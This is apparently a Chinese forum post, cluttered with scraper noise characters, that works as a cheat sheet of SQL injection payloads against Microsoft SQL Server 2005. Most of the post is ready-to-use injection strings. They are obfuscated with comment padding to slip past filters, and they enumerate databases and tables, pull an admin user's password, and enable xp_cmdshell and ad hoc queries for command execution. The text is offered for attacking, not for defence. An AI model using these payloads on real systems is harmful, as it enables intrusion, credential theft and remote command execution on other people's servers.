* e! ]) ~# b |' T: `0 [
}8 u0 d" H8 J7 F4 [+ T. D ]- W8 f+ e+ U% l' y
[Copy to clipboard]CODE:
* E6 u7 ^/ X1 e$ c [! x/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
* c6 U7 S# K' P9 J9 G- _7 O2 d% k. d2 y- F2 R! ^
爆表语句,somedb部份是所要列的数据库,红色数字1累加( F# F2 |6 e& w# c6 y' u0 a
" L9 D* v5 M( M. ^: u) F) G* @ V' S
[Copy to clipboard]CODE:
8 I- o4 o% Y$ R. R# x/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--, A: H L( m6 x: F0 i- I* J' D
- u% s. I7 b' T- T爆字段语句,爆表admin里user='icerover'的密码段
\: n0 d) p& j4 g% a! \3 x, B1 ]/ J9 `5 C: U
1 i0 n& t% p7 i( p: Q1 g* I[Copy to clipboard]CODE:
2 m4 K3 b( D+ r' X# F7 h**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--: L, O$ I+ t+ K6 q
6 E+ E6 t2 N0 b- j) G2 n' fmssql2005默认没有开xp_cmdshell的,openrowset也不能用7 d& i( ]0 m Y: j; u
如果是sa权限,可以这样来开启
7 e. r& | H& j8 m R/ g. d开启openrowset5 m' L, y: G7 T6 Z1 n& ]7 j
5 r! z% A5 R, w' i
, v B5 {, ^# m2 B. W+ m[Copy to clipboard]CODE:
: T# l: I# u: D2 j; X1 g2 x/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--3 E* g- q' D& C; u+ ?
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
2 z( J! z3 {' b, [! a4 Q1 @. e( I5 G1 Y4 v; Q# {1 N4 _: y
开启xp_cmdshell
. L) P2 Q' Y0 d% T% q# N/ O k) e, x5 B) _0 R9 _! {; Y2 `
, w- g+ P# j+ O% ]! I
[Copy to clipboard]CODE:8 ?) I, w- v' ~$ k5 z- Q6 q
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
* [3 I/ J* [4 g- q$ ?6 @3 H/ DEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--$ h( X8 r( n6 c2 R$ ]
5 J: Y' ^$ O8 {, v+ U! F; Lok,over~~晚安/ q' K& \, l. H! {
|